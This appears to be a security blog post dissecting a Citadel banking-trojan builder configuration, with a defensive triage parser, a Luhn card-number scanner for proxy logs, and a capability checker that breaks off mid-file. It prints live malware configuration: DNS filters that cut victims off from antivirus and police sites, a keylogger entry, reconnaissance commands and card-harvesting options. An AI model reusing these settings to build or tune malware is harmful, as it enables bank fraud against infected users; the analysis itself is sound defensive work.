<span style="font-family: Arial; font-size: 10.0pt;">de.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mx.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eu.shopmcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siblog.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanalert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drsolomon.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wwww.mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
</div>
<pre>
  onlinescan.avast.com=209.85.229.104
  download1.avast.com=209.85.229.104
  download2.avast.com=209.85.229.104
  download3.avast.com=209.85.229.104
  download4.avast.com=209.85.229.104
  download5.avast.com=209.85.229.104
  download6.avast.com=209.85.229.104
  download7.avast.com=209.85.229.104
  free.avg.com=209.85.229.104
  au.norton.com=209.85.229.104
  trustdefender.com=209.85.229.104
  avg.com=209.85.229.104
  www.avg.com=209.85.229.104
  sshop.avg.com=209.85.229.104
  pctools.com=209.85.229.104
  www.grisoft.cz=209.85.229.104
  www.grisoft.com=209.85.229.104
  free.grisoft.com=209.85.229.104
  bitdefender.com=209.85.229.104
  www.bitdefender.com=209.85.229.104
  msecn.net=209.85.229.104
  bitdefender.de=209.85.229.104
  www.bitdefender.de=209.85.229.104
  bitdefender.com.ua=209.85.229.104
  www.bitdefender.com.ua=209.85.229.104
  bitdefender.ru=209.85.229.104
  www.bitdefender.ru=209.85.229.104
  myaccount.bitdefender.co,=209.85.229.104
  download.bitdefender.com=209.85.229.104
  ftp.bitdefender.com=209.85.229.104
  forum.bitdefender.com=209.85.229.104
  upgrade.bitdefender.com=209.85.229.104
  agnitum.ru=209.85.229.104
  www.agnitum.ru=209.85.229.104
  agnitum.com=209.85.229.104
  www.agnitum.com=209.85.229.104
  agnitum.de=209.85.229.104
  www.agnitum.de=209.85.229.104
  outpostfirewall.com=209.85.229.104
  www.outpostfirewall.com=209.85.229.104
  dl1.agnitum.com=209.85.229.104
  dl2.agnitum.com=209.85.229.104
  antivirus.comodo.com=209.85.229.104
  comodo.com=209.85.229.104
  www.comodo.com=209.85.229.104
  forums.comodo.com=209.85.229.104
  comodogroup.com=209.85.229.104
  www.comodogroup.com=209.85.229.104
  personalfirewall.comodo.com=209.85.229.104
  www.personalfirewall.com=209.85.229.104
  hackerguardian.com=209.85.229.104
  www.hackerguardian.com=209.85.229.104
  www.nsclean.com=209.85.229.104
  nsclean.com=209.85.229.104
  clamav.net=209.85.229.104
  www.clamav.net=209.85.229.104
  db.local.clamav.net=209.85.229.104
  clamsupport.sourcefire.com=209.85.229.104
  lurker.clamav.net=209.85.229.104
  wiki.clamav.net=209.85.229.104
  w32.clamav.net=209.85.229.104
  lists.clamav.net=209.85.229.104
  clamwin.com=209.85.229.104
  www.clamwin.com=209.85.229.104
  ru.clamwin.com=209.85.229.104
  gietl.com=209.85.229.104
  www.gietl.com=209.85.229.104
  clamav.dyndns.org=209.85.229.104
  f-secure.com=209.85.229.104
  www.f-secure.com=209.85.229.104
  support.f-secure.com=209.85.229.104
  f-secure.ru=209.85.229.104
  www.f-secure.ru=209.85.229.104
  ftp.f-secure.com=209.85.229.104
  europe.f-secure.com=209.85.229.104
  www.europe.f-secure.com=209.85.229.104
  f-secure.de=209.85.229.104
  www.f-secure.de=209.85.229.104
  support.f-secure.de=209.85.229.104
  ftp.f-secure.de=209.85.229.104
  f-secure.co.uk=209.85.229.104
  www.f-secure.co.uk=209.85.229.104
  retail.sp.f-secure.com=209.85.229.104
  retail01.sp.f-secure.com=209.85.229.104
  retail02.sp.f-secure.com=209.85.229.104
  ftp.europe.f-secure.com=209.85.229.104
  norman.com=209.85.229.104
  www.norman.com=209.85.229.104
  download.norman.no=209.85.229.104
  sandbox.norman.no=209.85.229.104
  norman.no=209.85.229.104
  www.norman.no=209.85.229.104
  niuone.norman.no=209.85.229.104
  pandasecurity.com=209.85.229.104
  www.pandasecurity.com=209.85.229.104
  viruslab.ru=209.85.229.104
  www.viruslab.ru=209.85.229.104
  pandasoftware.com=209.85.229.104
  www.pandasoftware.com=209.85.229.104
  acs.pandasoftware.com=209.85.229.104
  www.pandasoftware.es=209.85.229.104
  anti-virus.by=209.85.229.104
  www.anti-virus.by=209.85.229.104
  virusblokada.ru=209.85.229.104
  www.virusblokada.ru=209.85.229.104
  vba32.de=209.85.229.104
  www.vba32.de=209.85.229.104
  ftp.nai.com=209.85.229.104
  secuser.com=209.85.229.104
  www.secuser.com=209.85.229.104
  tds.diamondcs.com.au=209.85.229.104
  windowsupdate.microsoft.com=209.85.229.104
  lavasoftusa.com=209.85.229.104
  www.lavasoftusa.com=209.85.229.104
  lavasoftusa.de=209.85.229.104
  www.lavasoftusa.de=209.85.229.104
  diamondcs.com.au=209.85.229.104
  shop.ca.com=209.85.229.104
  downloads.my-etrust.com=209.85.229.104
  v4.windowsupdate.microsoft.com=209.85.229.104
  v5.windowsupdate.microsoft.com=209.85.229.104
  noadware.net=209.85.229.104
  www.noadware.net=209.85.229.104
  zonelabs.com=209.85.229.104
  www.zonelabs.com=209.85.229.104
  moosoft.com=209.85.229.104
  www.moosoft.com=209.85.229.104
  secuser.model-fx.com=209.85.229.104
  pccreg.antivirus.com=209.85.229.104
  k-otik.com=209.85.229.104
  vupen.com=209.85.229.104
  www.vupen.com=209.85.229.104
  housecall.trendmicro.com=209.85.229.104
  trendmicro.com=209.85.229.104
  www.trendmicro.com=209.85.229.104
  us.trendmicro.com=209.85.229.104
  uk.trendmicro.com=209.85.229.104
  de.trendmicro.com=209.85.229.104
  fr.trendmicro.com=209.85.229.104
  es.trendmicro.com=209.85.229.104
  au.trendmicro.com=209.85.229.104
  it.trendmicro.com=209.85.229.104
  br.trendmicro.com=209.85.229.104
  antivirus.cai.com=209.85.229.104
  sophos.com=209.85.229.104
  www.sophos.com=209.85.229.104
  securitoo.com=209.85.229.104
  nordnet.com=209.85.229.104
  www.nordnet.com=209.85.229.104
  avgfrance.com=209.85.229.104
  www.avgfrance.com=209.85.229.104
  antivirus-online.de=209.85.229.104
  www.antivirus-online.de=209.85.229.104
  ftp.esafe.com=209.85.229.104
  ftp.microworldsystems.com=209.85.229.104
  ftp.ca.co=209.85.229.104
  files.trendmicro-europe.com=209.85.229.104
  inline-software.de=209.85.229.104
  ravantivirus.com=209.85.229.104
  www.ravantivirus.com=209.85.229.104
  f-prot.com=209.85.229.104
  www.f-prot.com=209.85.229.104
  files.f-prot.com=209.85.229.104
  secure.f-prot.com=209.85.229.104
  vsantivirus.com=209.85.229.104
  www.vsantivirus.com=209.85.229.104
  openantivirus.org=209.85.229.104
  www.openantivirus.org=209.85.229.104
  www3.ca.com=209.85.229.104
  dialognauka.ru=209.85.229.104
  www.dialognauka.ru=209.85.229.104
  anti-virus-software-review.com=209.85.229.104
  www.anti-virus-software-review.com=209.85.229.104
  www.vet.com.au=209.85.229.104
  antiviraldp.com=209.85.229.104
  www.antiviraldp.com=209.85.229.104
  www.proantivirus.com=209.85.229.104
  pestpatrol.com=209.85.229.104
  www.pestpatrol.com=209.85.229.104
  simplysup.com=209.85.229.104
  www.simplysup.com=209.85.229.104
  misec.net=209.85.229.104
  www.misec.net=209.85.229.104
  www1.my-etrust.com=209.85.229.104
  authentium.com=209.85.229.104
  www.authentium.com=209.85.229.104
  finjan.com=209.85.229.104
  www.finjan.com=209.85.229.104
  www.ikarus-software.at=209.85.229.104
  www.ika-rus.com=209.85.229.104
  ika-rus.com=209.85.229.104
  tinysoftware.com=209.85.229.104
  www.tinysoftware.com=209.85.229.104
  visualizesoftware.com=209.85.229.104
  www.visualizesoftware.com=209.85.229.104
  kerio.com=209.85.229.104
  www.kerio.com=209.85.229.104
  www.kerio.eu=209.85.229.104
  www.zonelabs.com=209.85.229.104
  zonelog.co.uk=209.85.229.104
  www.zonelog.co.uk=209.85.229.104
  webroot.com=209.85.229.104
  www.webroot.com=209.85.229.104
  www.lavasoft.nu=209.85.229.104
  spywareguide.com=209.85.229.104
  www.spywareguide.com=209.85.229.104
  spyblocker-software.com=209.85.229.104
  www.spyblocker-software.com=209.85.229.104
  www.spamhaus.org=209.85.229.104
  spamcop.net=209.85.229.104
  www.spamcop.net=209.85.229.104
  bobbear.co.uk=209.85.229.104
  www.bobbear.co.uk=209.85.229.104
  domaintools.com=209.85.229.104
  www.domaintools.com=209.85.229.104
  centralops.net=209.85.229.104
  www.centralops.net=209.85.229.104
  www.robtex.com=209.85.229.104
  dnsstuff.com=209.85.229.104
  www.dnsstuff.com=209.85.229.104
  ripe.net=209.85.229.104
  www.ripe.net=209.85.229.104
  www.met.police.uk=209.85.229.104
  nbi.gov.ph=209.85.229.104
  www.nbi.gov.ph=209.85.229.104
  www.police.gov.hk=209.85.229.104
  treasury.gov=209.85.229.104
  www.treasury.gov=209.85.229.104
  cybercrime.gov=209.85.229.104
  www.cybercrime.gov=209.85.229.104
  www.cybercrime.ch=209.85.229.104
  enisa.europa.eu=209.85.229.104
  www.enisa.europa.eu=209.85.229.104
  www.interpol.int=209.85.229.104
  www.fsa.gov.uk=209.85.229.104
  www.companies-house.gov.uk=209.85.229.104
  fraudaid.com=209.85.229.104
  www.fraudaid.com=209.85.229.104
  scambusters.org=209.85.229.104
  www.scambusters.org=209.85.229.104
  spamtrackers.eu=209.85.229.104
  www.spamtrackers.eu=209.85.229.104
 end
 entry "CmdList"
  "net view"
  "tasklist"
  "set"
 end

 entry "Keylogger"
  processes "calc___.exe"
  time 1
 end

 entry "Video"
  quality 1
  length 500
 end
end
</pre>
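<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">The dump above follows the Zeus/Citadel text layout: a line of the form entry "Name" opens a block, a bare end closes it, and blocks nest. The long host-to-IP list pins antivirus vendors, Windows Update, DNS lookup services and law-enforcement sites to a single address, so the infected machine can no longer reach any of them. The Python below is an added example, not code from this page or from the Citadel builder: a parser for that block syntax plus a triage function that, given a host map block, reports how many distinct target addresses it uses and which security-related hostnames are redirected. It runs on a constructed excerpt whose inner lines are copied from the dump; the enclosing entry names "DynamicConfig" and "DnsMap" and the keyword list are assumptions of the example.</span></div>

```python
"""Parser and triage helper for Zeus/Citadel-style text config dumps.

Added example: it assumes only the block syntax visible in the dump
(`entry "Name"` ... `end`, blocks may nest). It is not the Citadel
builder's own code, and the entry names in SAMPLE_CONFIG are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt. Inner lines come from the dump on the page; the two
# enclosing entry names ("DynamicConfig", "DnsMap") are assumed, not from it.
SAMPLE_CONFIG = """
entry "DynamicConfig"
  entry "DnsMap"
    onlinescan.avast.com=209.85.229.104
    free.avg.com=209.85.229.104
    windowsupdate.microsoft.com=209.85.229.104
    www.interpol.int=209.85.229.104
    myaccount.bitdefender.co,=209.85.229.104
  end
  entry "CmdList"
    "net view"
    "tasklist"
    "set"
  end
  entry "Keylogger"
    processes "calc___.exe"
    time 1
  end
end
"""

# Substrings that mark a hostname as security- or investigation-related.
# Constructed list for this example; extend it from the full dump as needed.
SECURITY_KEYWORDS = (
    "avast", "avg", "norton", "bitdefender", "clamav", "f-secure", "sophos",
    "trendmicro", "windowsupdate", "interpol", "police", "cybercrime",
)

_ENTRY_RE = re.compile(r'^entry\s+"([^"]*)"\s*$')
# host=IPv4; the class keeps ',' so the malformed name in the dump still parses.
_HOSTMAP_RE = re.compile(r"^([A-Za-z0-9.\-_,]+)=(\d{1,3}(?:\.\d{1,3}){3})$")


@dataclass
class Block:
    name: str
    lines: list[str] = field(default_factory=list)
    children: list[Block] = field(default_factory=list)


def parse_config(text: str) -> Block:
    """Build a tree of blocks; non-blank lines other than entry/end are kept verbatim."""
    root = Block("<root>")
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _ENTRY_RE.match(line)
        if m:
            child = Block(m.group(1))
            stack[-1].children.append(child)
            stack.append(child)
        elif line == "end":
            if len(stack) == 1:
                raise ValueError("'end' without a matching entry")
            stack.pop()
        else:
            stack[-1].lines.append(line)
    if len(stack) != 1:
        raise ValueError(f"block {stack[-1].name!r} was never closed")
    return root


def find_block(block: Block, name: str) -> Block | None:
    """Depth-first search for the first block with the given name."""
    if block.name == name:
        return block
    for child in block.children:
        hit = find_block(child, name)
        if hit is not None:
            return hit
    return None


def host_redirects(block: Block) -> dict[str, str]:
    """Extract host=IP pairs from a block's lines."""
    pairs: dict[str, str] = {}
    for line in block.lines:
        m = _HOSTMAP_RE.match(line)
        if m:
            pairs[m.group(1)] = m.group(2)
    return pairs


def triage_dnsmap(redirects: dict[str, str]) -> dict:
    """Summarise a host map. Many unrelated hosts pinned to one address is the
    signature of a resolver hijack meant to cut the victim off from AV updates."""
    by_target: dict[str, list[str]] = {}
    for host, ip in redirects.items():
        by_target.setdefault(ip, []).append(host)
    security = sorted(
        h for h in redirects if any(k in h.lower() for k in SECURITY_KEYWORDS)
    )
    return {
        "hosts": len(redirects),
        "distinct_targets": len(by_target),
        "security_hosts_redirected": security,
        "single_sink": len(by_target) == 1 and len(redirects) >= 3,
    }


if __name__ == "__main__":
    tree = parse_config(SAMPLE_CONFIG)
    dnsmap = find_block(tree, "DnsMap")
    print(triage_dnsmap(host_redirects(dnsmap)))
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Running the block on the full dump instead of the excerpt gives the same shape of result: one target address, several hundred hosts, and every security-related name flagged. Keeping the parser separate from the triage means the same tree can be queried for the CmdList, Keylogger and Video blocks when building detections for those features.</span></div>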
<br />Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-22650527159836266882012-09-18T15:25:00.003-07:002012-09-18T15:25:58.029-07:00Config file troyan Citadel Builder 1.3.4.5<br />
<div class="MsoNormal">
<span style="font-family: Arial;">This post presents the configuration file of the Citadel trojan, successor of the well-known Zeus banking trojan. The builder reads this file to create the malicious binary that infects users and communicates with the server hosting the criminal infrastructure.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Among the new features of this version, the modular configuration stands out: which options are available depends on the modules that have been purchased on the black market.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">One of these modules is "CardSwipe", whose purpose is to capture credit card data from the victim's browsing so that it can be used fraudulently.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">In this config file the criminals have this option switched on:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> </span><span style="font-family: Arial;"> </span></div>
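<div class="MsoNormal">
<span style="font-family: Arial;">The two luhn10 options above make the bot scan every GET query string and POST body for digit runs that pass the Luhn check, so card numbers are harvested from any site without a webinject. The following script is an added example written for this post, not code from the Citadel builder; it reproduces that parsing logic in Python and, run on the defender's side over proxy or DLP logs, finds card numbers leaving in clear text. The sample requests are constructed and use standard test card numbers.</span></div>

```python
"""Added example, not code from the Citadel builder or from this post.

The CardSwipe options enable_luhn10_get / enable_luhn10_post make the bot scan
the query string of GET requests and the body of POST requests for digit runs
that pass the Luhn (mod 10) check, so card numbers are harvested from any site
without needing a webinject. The same logic run on the defender's side (proxy
or DLP logs) finds card data leaving in clear text. The requests below are
constructed for this example and use standard test card numbers, not real ones.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# A candidate is 13-19 digits, optionally separated by single spaces or dashes,
# not glued to other digits on either side.
_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(number: str) -> bool:
    """True if the digit string passes the Luhn checksum (13-19 digits)."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9          # same as summing the two digits of the product
        total += d
    return total % 10 == 0


def find_pans(text: str) -> list:
    """All Luhn-valid candidates in text, normalised to bare digits."""
    found = []
    for m in _CANDIDATE.finditer(text):
        pan = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(pan):
            found.append(pan)
    return found


def scan_request(method: str, url: str, body: str = "") -> dict:
    """Mimic the two options: GET -> query string only, POST -> form body only.
    Returns {parameter_name: [pans]} for parameters that carried a valid PAN."""
    if method.upper() == "GET":
        params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    else:
        params = parse_qsl(body, keep_blank_values=True)
    hits = {}
    for name, value in params:
        pans = find_pans(value)
        if pans:
            hits.setdefault(name, []).extend(pans)
    return hits


# Constructed sample traffic (4111... and 5500... are test PANs, not real cards).
SAMPLE_REQUESTS = [
    ("POST", "http://shop.example/checkout",
     "name=J+Doe&card=4111-1111-1111-1111&exp=12%2F25&cvv=123"),
    ("GET", "http://bank.example/pay?acct=5500000000000004&amt=10", ""),
    # 16 digits that fail Luhn: a naive digit-run grep flags this, the bot does not
    ("POST", "http://forum.example/post", "msg=order+1234567890123456+arrived"),
]


def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """(method, url, hits) per request; hits is empty when nothing valid was found."""
    return [(m, u, scan_request(m, u, b)) for m, u, b in requests]


if __name__ == "__main__":
    for method, url, hits in scan_all():
        print(method, url, hits or "-")
```

<div class="MsoNormal">
<span style="font-family: Arial;">Running the script prints, for each request, the parameter names that carried a valid card number. The third request shows why the bot uses Luhn instead of a plain digit-run match: sixteen digits that fail the checksum produce no hit, which keeps the stolen logs free of order numbers and timestamps.</span></div>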
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">It was possible to reproduce the injection the trojan performs on the infected machine and to capture the screen shown to the user while browsing: when the user accesses Internet banking it asks for all the confidential data of the credit card.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s1600/inject.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s400/inject.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Note how the trojan requests the secret PIN (ATM PIN) and the Social Security Number (SSN), data that a bank never requests from the customer under any circumstance.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Other configuration parameters control the capture of video footage from the infected computer. In this sample the module is switched off (use_module_video 0), although the "Video" entry with its quality and length parameters is still defined:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">use_module_video
0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">entry
"Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> </span><span style="font-family: Arial;"> </span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">This is very useful for criminals: recording the screen in real time while the user enters the transfer authorization codes defeats authentication schemes based on virtual keyboards, which a conventional keylogger cannot capture.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Other options let Citadel control the grabbing of data sent through the Chrome browser (disable_httpgrabber), enable anti-emulation protection so that the binary refuses to run on virtual machines such as VMware or VirtualBox and is harder to analyze (antiemulation_enable), control whether cookies are sent to the gate (disable_cookies), and block access to the websites of antivirus companies and malware removal sites. The blocking is done through the "DnsFilters" section, which redirects the user to the Google homepage (209.85.229.104) every time they try to reach one of the listed hosts. In this particular config antiemulation_enable is 0 and disable_cookies is 0, so the VM check is off and cookies are still sent to the gate. The redirection does not modify the hosts file on the infected computer; Citadel does it by controlling the computer's DNS resolution, so a clean hosts file is no evidence that the machine is clean.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">It also blocks access to the web pages of law enforcement agencies and police cybercrime units, as the capture below shows.<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s1600/hosts-policia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s320/hosts-policia.jpg" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;">The following lines show the configuration of Citadel Builder 1.3.4.5.</span></div>
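<div class="MsoNormal">
<span style="font-family: Arial;">The builder config below uses the plaintext Zeus/Citadel format: comment lines starting with ";", "entry" blocks closed by "end", "key value" lines, bare quoted items in WebFilters and "host=ip" lines in DnsFilters. The following parser is an added example written for this post, not code from the Citadel builder; it reads that format and answers the two questions a responder asks of such a file: which paid capabilities are actually switched on (using the on/off meanings from the builder's own short manual) and which hosts on a suspect machine resolve to the forced IP. The config excerpt is constructed from the values on this page, and the resolver answers are made up (RFC 5737 addresses for the clean ones).</span></div>

```python
"""Added example, not code from the Citadel builder or from this post.

Parser for the plaintext builder config format shown on this page (';' comment
lines, 'entry "Name" ... end' blocks, 'key value' lines, bare quoted items in
WebFilters, 'host=ip' lines in DnsFilters), plus two checks a responder wants
from it: which paid capabilities are actually switched on, using the on/off
meanings from the builder's own short manual, and which hosts on a suspect
machine resolve to the forced IP. SAMPLE_CONFIG is a constructed excerpt that
keeps the page's option values and three of its DnsFilters lines; the resolver
answers in SAMPLE_LOOKUPS are made up (RFC 5737 addresses for the clean ones).
"""
import shlex

SAMPLE_CONFIG = r'''
;; Default config + updated AV's list (redirect to google.com)
entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  remove_certs 1
; disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  use_module_video 0
end
entry "DynamicConfig"
  file_webinjects "webinjects.txt"
  entry "WebFilters"
    "!http://*"
  end
  entry "DnsFilters"
bitdefender.com=209.85.229.104
virustotal.com=209.85.229.104
zeustracker.abuse.ch=209.85.229.104
  end
end
'''


def parse_config(text: str) -> dict:
    """Nested dict: entry name -> {key: value, ..., '_items': [bare quoted strings]}."""
    root = {"_items": []}
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # blank or comment line
            continue
        if line.startswith("entry "):
            node = {"_items": []}
            stack[-1][shlex.split(line)[1]] = node
            stack.append(node)
        elif line == "end":
            if len(stack) > 1:
                stack.pop()
        elif "=" in line and " " not in line:       # DnsFilters: host=ip
            host, ip = line.split("=", 1)
            stack[-1][host] = ip
        elif line.startswith('"'):                  # bare quoted item (WebFilters etc.)
            stack[-1]["_items"].append(shlex.split(line)[0])
        else:                                       # key value
            key, _, val = line.partition(" ")
            val = val.strip()
            if len(val) >= 2 and val[0] == val[-1] == '"':
                val = val[1:-1]
            stack[-1][key] = val
    return root


# Value that means "active", taken from the short manual in the config header.
CAPABILITIES = {
    "enable_luhn10_get":    ("1", "CardSwipe: scan GET query strings for card numbers"),
    "enable_luhn10_post":   ("1", "CardSwipe: scan POST bodies for card numbers"),
    "use_module_video":     ("1", "video grabber"),
    "antiemulation_enable": ("1", "refuse to run under VMware/VirtualBox"),
    "disable_cookies":      ("0", "cookies sent to gate, .sol files deleted"),
    "disable_antivirus":    ("0", "MiniAV module active"),
    "report_software":      ("1", "report installed AV/firewall to gate"),
}


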